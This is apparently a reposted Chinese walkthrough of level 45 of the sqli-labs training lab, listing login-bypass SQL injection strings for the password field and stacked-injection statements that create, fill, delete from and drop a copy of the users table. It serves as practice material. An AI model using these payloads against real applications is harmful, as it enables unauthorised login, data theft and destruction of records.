Java教程

Sqli labs less 45

本文主要是介绍Sqli labs less 45,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

1.在用户名使用万能密码测试,全部都登录失败。在密码字段使用万能密码测试,使用单引号和引号闭合时登录成功。说明用户名参数注入时存在过滤,密码字段存在单引号闭合的字符型注入。

a' OR 1 = 1#
a') OR 1 = 1#

 

 2.堆叠注入:同上几个less,每次登陆时完成一步堆叠注入。

a') OR 1 = 1;CREATE TABLE WhiteMoon LIKE users;#
a') OR 1 = 1;INSERT INTO WhiteMoon SELECT * FROM users;#
a') OR 1 = 1;DELETE FROM WhiteMoon;#
a') OR 1 = 1;DROP TABLE WhiteMoon;#

 

这篇关于Sqli labs less 45的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!